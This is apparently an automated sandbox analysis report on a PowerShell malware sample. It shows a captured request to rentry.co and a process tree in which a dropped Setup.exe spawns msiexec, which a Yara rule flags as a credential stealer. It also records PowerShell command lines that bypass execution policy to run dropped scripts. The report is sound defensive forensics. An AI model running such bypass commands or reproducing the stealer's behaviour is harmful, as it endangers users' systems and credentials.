                                                                                                                                                            Host: rentry.co
                                                                                                                                                            2024-11-19 19:06:41 UTC1279INHTTP/1.1 403 Forbidden
                                                                                                                                                            Date: Tue, 19 Nov 2024 19:06:41 GMT
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Content-Length: 8771
                                                                                                                                                            Connection: close
                                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                            Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                            Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                            Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                            Origin-Agent-Cluster: ?1
                                                                                                                                                            Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                            Referrer-Policy: same-origin
                                                                                                                                                            X-Content-Options: nosniff
                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                            cf-mitigated: challenge
                                                                                                                                                            2024-11-19 19:06:41 UTC893INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 65 74 58 35 6d 70 58 66 72 4b 69 67 4a 6d 59 56 76 54 6d 32 58 43 44 45 4a 53 78 2b 63 2b 46 63 76 6d 31 70 4b 77 50 37 59 55 50 35 54 49 78 51 55 64 62 59 2b 52 6c 34 6c 64 65 47 6b 54 6a 69 66 38 79 6f 48 68 38 59 69 33 52 68 77 4a 4b 56 77 6d 58 6d 78 61 6d 6a 5a 74 62 2f 49 44 5a 34 77 56 73 32 30 55 50 55 62 4e 36 33 69 63 62 53 64 58 58 4d 64 71 4b 36 53 53 79 39 44 77 4f 41 46 4f 36 56 5a 4e 4c 38 50 66 36 46 74 78 49 47 68 75 39 64 69 51 3d 3d 24 64 4f 30 77 36 61 4b 6e 4a 7a 52 2f 35 2f 45 57 32 4c 6f 71 47 77 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61
                                                                                                                                                            Data Ascii: cf-chl-out: etX5mpXfrKigJmYVvTm2XCDEJSx+c+Fcvm1pKwP7YUP5TIxQUdbY+Rl4ldeGkTjif8yoHh8Yi3RhwJKVwmXmxamjZtb/IDZ4wVs20UPUbN63icbSdXXMdqK6SSy9DwOAFO6VZNL8Pf6FtxIGhu9diQ==$dO0w6aKnJzR/5/EW2LoqGw==Cache-Control: private, max-age=0, no-store, no-cache, must-reva
                                                                                                                                                            2024-11-19 19:06:41 UTC566INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70
                                                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewp
                                                                                                                                                            2024-11-19 19:06:41 UTC1369INData Raw: 2c 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 2c 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 7d 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 7d 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 38 72 65 6d 20 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 2e 35 72 65 6d 7d 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 20 37 32 30 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 72 65 6d 7d 7d 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69
                                                                                                                                                            Data Ascii: ,Segoe UI Symbol,Noto Color Emoji}body{display:flex;flex-direction:column;height:100vh;min-height:100vh}.main-content{margin:8rem auto;max-width:60rem;padding-left:1.5rem}@media (width <= 720px){.main-content{margin-top:4rem}}.h2{font-size:1.5rem;font-wei
                                                                                                                                                            2024-11-19 19:06:41 UTC1369INData Raw: 70 61 6e 3e 3c 2f 64 69 76 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 72 65 6e 74 72 79 2e 63 6f 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 52 61 79 3a 20 27 38 65 35 32 37 61 39 39 38 66 38 31 31 38 30 31 27 2c 63 48 3a 20 27 46 31 52 77 66 30 64 32 62 5f 37 57 53 67 4a 2e 31 58 31 2e 4e 75 5a 46 4c 58 4d 59 48 75 55 52 6c 43 43 66 32 68 53 37 30 6d 73 2d 31 37 33 32 30 34 33 32 30 31 2d 31 2e 32 2e 31 2e 31 2d 41 4c 48 68 68 49 59 6f 54 69 35 62 58 38 30 74 75 73 32 58 47 5a 53 31 73 2e 6c 6e 58 36 6b 4a 4d 38 76 6e 61 51 79 53 36 39 4b
                                                                                                                                                            Data Ascii: pan></div></noscript></div></div><script>(function(){window._cf_chl_opt={cvId: '3',cZone: "rentry.co",cType: 'managed',cRay: '8e527a998f811801',cH: 'F1Rwf0d2b_7WSgJ.1X1.NuZFLXMYHuURlCCf2hS70ms-1732043201-1.2.1.1-ALHhhIYoTi5bX80tus2XGZS1s.lnX6kJM8vnaQyS69K
                                                                                                                                                            2024-11-19 19:06:41 UTC1369INData Raw: 31 32 61 71 31 32 77 58 57 65 42 52 6b 5f 6a 38 6f 2e 71 6e 48 63 66 6c 76 45 48 6e 41 68 48 68 57 44 31 67 45 63 4f 6c 4b 67 73 6c 59 65 69 73 69 44 4b 76 47 68 6f 62 63 39 56 64 4b 78 72 6d 39 76 42 79 6b 48 76 56 6f 35 35 71 61 64 48 7a 6a 77 74 58 5f 5a 59 62 45 32 77 45 55 4a 53 30 36 52 54 71 38 78 37 4f 66 4c 41 66 37 70 7a 4e 42 4f 46 6b 33 65 54 73 6f 66 31 4c 45 53 4c 36 35 6f 59 37 66 37 45 6e 6a 2e 63 65 55 69 45 58 52 34 31 50 47 65 74 5a 78 67 56 79 73 45 75 65 4e 77 54 6b 49 45 33 61 4f 5a 41 5a 75 74 39 64 66 79 66 67 42 46 62 31 42 74 2e 62 52 65 76 51 50 2e 6c 72 6f 6e 4c 4b 58 54 4b 50 44 52 41 43 30 41 70 52 43 32 39 6a 77 35 53 2e 65 44 69 74 7a 38 70 36 50 59 38 7a 32 50 51 2e 34 50 50 46 51 47 44 49 47 41 64 73 35 6c 32 5f 76 33 6e
                                                                                                                                                            Data Ascii: 12aq12wXWeBRk_j8o.qnHcflvEHnAhHhWD1gEcOlKgslYeisiDKvGhobc9VdKxrm9vBykHvVo55qadHzjwtX_ZYbE2wEUJS06RTq8x7OfLAf7pzNBOFk3eTsof1LESL65oY7f7Enj.ceUiEXR41PGetZxgVysEueNwTkIE3aOZAZut9dfyfgBFb1Bt.bRevQP.lronLKXTKPDRAC0ApRC29jw5S.eDitz8p6PY8z2PQ.4PPFQGDIGAds5l2_v3n
                                                                                                                                                            2024-11-19 19:06:41 UTC1369INData Raw: 75 33 41 62 5f 7a 6a 34 63 4b 5a 6c 5f 50 6e 46 76 35 68 46 73 38 5f 71 75 78 68 66 6a 64 63 37 62 36 7a 63 30 61 72 30 4e 36 35 51 42 51 2e 5f 71 61 5f 73 58 35 34 6d 73 4c 71 7a 45 56 66 46 55 43 41 71 48 78 64 44 6e 58 7a 68 6e 63 78 72 42 62 54 70 78 45 6b 4f 73 6c 69 47 42 6a 6f 69 53 34 51 66 6c 62 67 75 4b 6a 6e 57 4e 4e 6a 64 6a 55 7a 78 52 69 49 73 73 54 55 51 73 37 36 48 37 58 70 74 52 6a 62 35 77 41 31 53 4e 79 42 41 31 6c 74 5f 52 6e 69 51 4a 33 54 36 68 42 58 67 58 6b 43 6b 7a 6d 36 58 33 65 66 6e 33 47 46 74 6d 4c 34 38 5a 69 50 42 38 66 73 32 4b 61 69 32 58 6c 77 50 74 33 59 4d 5a 50 52 36 48 37 4d 48 4d 41 78 76 59 64 74 73 68 42 48 38 54 51 6b 57 55 67 42 57 75 71 78 32 51 62 76 47 37 6c 5f 6e 45 34 6d 54 66 6f 46 36 64 65 71 48 52 68 41
                                                                                                                                                            Data Ascii: u3Ab_zj4cKZl_PnFv5hFs8_quxhfjdc7b6zc0ar0N65QBQ._qa_sX54msLqzEVfFUCAqHxdDnXzhncxrBbTpxEkOsliGBjoiS4QflbguKjnWNNjdjUzxRiIssTUQs76H7XptRjb5wA1SNyBA1lt_RniQJ3T6hBXgXkCkzm6X3efn3GFtmL48ZiPB8fs2Kai2XlwPt3YMZPR6H7MHMAxvYdtshBH8TQkWUgBWuqx2QbvG7l_nE4mTfoF6deqHRhA
                                                                                                                                                            2024-11-19 19:06:41 UTC1369INData Raw: 4f 54 35 36 64 5a 6a 52 32 58 6b 50 70 2e 6f 6c 35 53 74 6f 57 31 6e 4e 6f 76 6a 51 6f 75 33 68 37 42 55 6a 57 51 41 55 34 52 4a 55 32 74 75 4e 43 6b 4e 37 72 48 31 42 77 6d 6c 5f 55 78 58 72 53 69 66 35 64 39 64 51 58 64 38 44 55 57 47 59 4b 34 52 70 6a 57 6a 6b 48 61 4f 6c 6d 74 6f 46 69 59 50 70 72 67 66 61 6b 75 68 4d 35 73 69 52 39 44 4d 42 73 32 71 4d 48 57 49 35 59 6b 4c 37 55 62 2e 4f 36 75 76 42 74 50 69 6b 4c 55 2e 32 6b 49 55 72 45 77 63 66 73 6e 6b 51 51 69 34 45 55 4d 4e 78 4f 64 4b 45 33 43 56 45 49 6f 42 61 54 77 47 70 41 5f 73 39 6d 52 43 34 70 61 63 31 59 35 48 75 77 59 7a 39 78 32 57 63 6d 50 70 43 61 33 47 6b 42 56 6e 52 42 68 33 72 4c 78 64 66 58 50 6e 51 6c 4d 31 75 57 2e 4b 48 31 5a 75 6b 54 56 4a 55 72 6a 56 38 74 6b 33 46 38 39 4a
                                                                                                                                                            Data Ascii: OT56dZjR2XkPp.ol5StoW1nNovjQou3h7BUjWQAU4RJU2tuNCkN7rH1Bwml_UxXrSif5d9dQXd8DUWGYK4RpjWjkHaOlmtoFiYPprgfakuhM5siR9DMBs2qMHWI5YkL7Ub.O6uvBtPikLU.2kIUrEwcfsnkQQi4EUMNxOdKE3CVEIoBaTwGpA_s9mRC4pac1Y5HuwYz9x2WcmPpCa3GkBVnRBh3rLxdfXPnQlM1uW.KH1ZukTVJUrjV8tk3F89J
                                                                                                                                                            2024-11-19 19:06:41 UTC1360INData Raw: 6c 5f 48 37 39 76 56 70 49 73 64 42 44 71 68 62 2e 6a 67 4e 54 74 35 52 59 59 4f 30 77 64 4f 70 66 66 74 45 38 54 66 33 4b 4d 72 61 51 75 5f 68 6d 44 41 53 50 76 48 76 4c 6a 59 5f 6a 62 4d 76 33 48 71 6f 30 78 47 71 5f 62 4f 43 69 45 64 43 4b 69 49 43 76 42 5f 6c 66 76 38 65 46 37 68 58 32 72 4d 62 48 44 73 30 2e 53 31 45 42 2e 37 37 7a 4c 46 2e 71 42 65 30 6c 55 58 76 62 36 58 54 73 39 30 77 54 66 4c 54 57 42 78 62 4c 30 4f 6e 74 4b 51 6f 6a 46 66 44 6b 4c 6f 51 6e 34 48 4e 62 59 36 48 41 57 51 62 36 32 62 62 44 43 65 50 6d 58 34 74 61 45 77 47 73 6e 7a 31 5f 4f 37 56 69 68 66 45 48 45 38 32 51 75 66 46 68 4a 32 44 41 69 5f 77 55 66 45 4a 31 53 54 4e 57 2e 47 70 62 31 79 66 62 55 52 5f 36 48 38 50 68 51 57 68 45 78 78 65 59 66 6d 75 54 65 2e 33 4b 6a 54
                                                                                                                                                            Data Ascii: l_H79vVpIsdBDqhb.jgNTt5RYYO0wdOpfftE8Tf3KMraQu_hmDASPvHvLjY_jbMv3Hqo0xGq_bOCiEdCKiICvB_lfv8eF7hX2rMbHDs0.S1EB.77zLF.qBe0lUXvb6XTs90wTfLTWBxbL0OntKQojFfDkLoQn4HNbY6HAWQb62bbDCePmX4taEwGsnz1_O7VihfEHE82QufFhJ2DAi_wUfEJ1STNW.Gpb1yfbUR_6H8PhQWhExxeYfmuTe.3KjT


                                                                                                                                                            Statistics

                                                                                                                                                            CPU Usage

                                                                                                                                                            Click to jump to process

                                                                                                                                                            Memory Usage

                                                                                                                                                            Click to jump to process

                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                            Behavior

                                                                                                                                                            Click to jump to process

                                                                                                                                                            System Behavior

                                                                                                                                                            General

                                                                                                                                                            Target ID:1
                                                                                                                                                            Start time:14:05:29
                                                                                                                                                            Start date:19/11/2024
                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\xaSPJNbl.ps1"
                                                                                                                                                            Imagebase:0x7ff6cb6b0000
                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:2
                                                                                                                                                            Start time:14:05:29
                                                                                                                                                            Start date:19/11/2024
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff6ee680000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:4
                                                                                                                                                            Start time:14:06:03
                                                                                                                                                            Start date:19/11/2024
                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe"
                                                                                                                                                            Imagebase:0x7ff668710000
                                                                                                                                                            File size:5'644'904 bytes
                                                                                                                                                            MD5 hash:AD2735F096925010A53450CB4178C89E
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:7
                                                                                                                                                            Start time:14:06:11
                                                                                                                                                            Start date:19/11/2024
                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe"
                                                                                                                                                            Imagebase:0x7ff668710000
                                                                                                                                                            File size:5'644'904 bytes
                                                                                                                                                            MD5 hash:AD2735F096925010A53450CB4178C89E
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:8
                                                                                                                                                            Start time:14:06:12
                                                                                                                                                            Start date:19/11/2024
                                                                                                                                                            Path:C:\Windows\SysWOW64\more.com
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Windows\SysWOW64\more.com
                                                                                                                                                            Imagebase:0xf40000
                                                                                                                                                            File size:24'576 bytes
                                                                                                                                                            MD5 hash:03805AE7E8CBC07840108F5C80CF4973
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:moderate
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:9
                                                                                                                                                            Start time:14:06:12
                                                                                                                                                            Start date:19/11/2024
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff6ee680000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:10
                                                                                                                                                            Start time:14:06:19
                                                                                                                                                            Start date:19/11/2024
                                                                                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            Imagebase:0x7ff7194a0000
                                                                                                                                                            File size:59'904 bytes
                                                                                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2132155751.0000000000766000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2090035846.0000000000763000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2119251555.0000000000765000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2121215580.0000000000766000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2055763748.0000000000765000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2070770493.0000000000768000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2119642948.0000000000766000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2090149211.0000000000767000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2138816482.000000000077B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2070467409.0000000000768000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:11
                                                                                                                                                            Start time:14:06:20
                                                                                                                                                            Start date:19/11/2024
                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe"
                                                                                                                                                            Imagebase:0x7ff668710000
                                                                                                                                                            File size:5'644'904 bytes
                                                                                                                                                            MD5 hash:AD2735F096925010A53450CB4178C89E
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:12
                                                                                                                                                            Start time:14:06:21
                                                                                                                                                            Start date:19/11/2024
                                                                                                                                                            Path:C:\Windows\SysWOW64\more.com
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Windows\SysWOW64\more.com
                                                                                                                                                            Imagebase:0xf40000
                                                                                                                                                            File size:24'576 bytes
                                                                                                                                                            MD5 hash:03805AE7E8CBC07840108F5C80CF4973
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:moderate
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:13
                                                                                                                                                            Start time:14:06:21
                                                                                                                                                            Start date:19/11/2024
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff6ee680000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:14
                                                                                                                                                            Start time:14:06:28
                                                                                                                                                            Start date:19/11/2024
                                                                                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            Imagebase:0xaa0000
                                                                                                                                                            File size:59'904 bytes
                                                                                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:15
                                                                                                                                                            Start time:14:06:41
                                                                                                                                                            Start date:19/11/2024
                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\2NTZ8H8AG941JFZKJESP7NAC.ps1"
                                                                                                                                                            Imagebase:0xb0000
                                                                                                                                                            File size:433'152 bytes
                                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:16
                                                                                                                                                            Start time:14:06:41
                                                                                                                                                            Start date:19/11/2024
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff6ee680000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Disassembly

                                                                                                                                                            Reset < >

                                                                                                                                                              Non-executed Functions

                                                                                                                                                              Function 00007FFBA19D4E60 Relevance: 498.7, APIs: 224, Strings: 60, Instructions: 1670threadCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Generic$Argument@@ReturnString@@$Variant@@$Object@@$MetaString@@@$Latin1Type@$ConnectionData@@ListUrl@@$?invokeArgument@@333333333@ByteConnection@Method@Qt@@Thread@@$?begin@?connect@?const?convert@?dispose@?end@?scheme@?set?start@?tr@?userArrayArray@@Bool@DataData@Data@1@@Name@ObjectObject@@@Priority@1@@Ptr@@@Qt@@@V0@@Valid@malloc
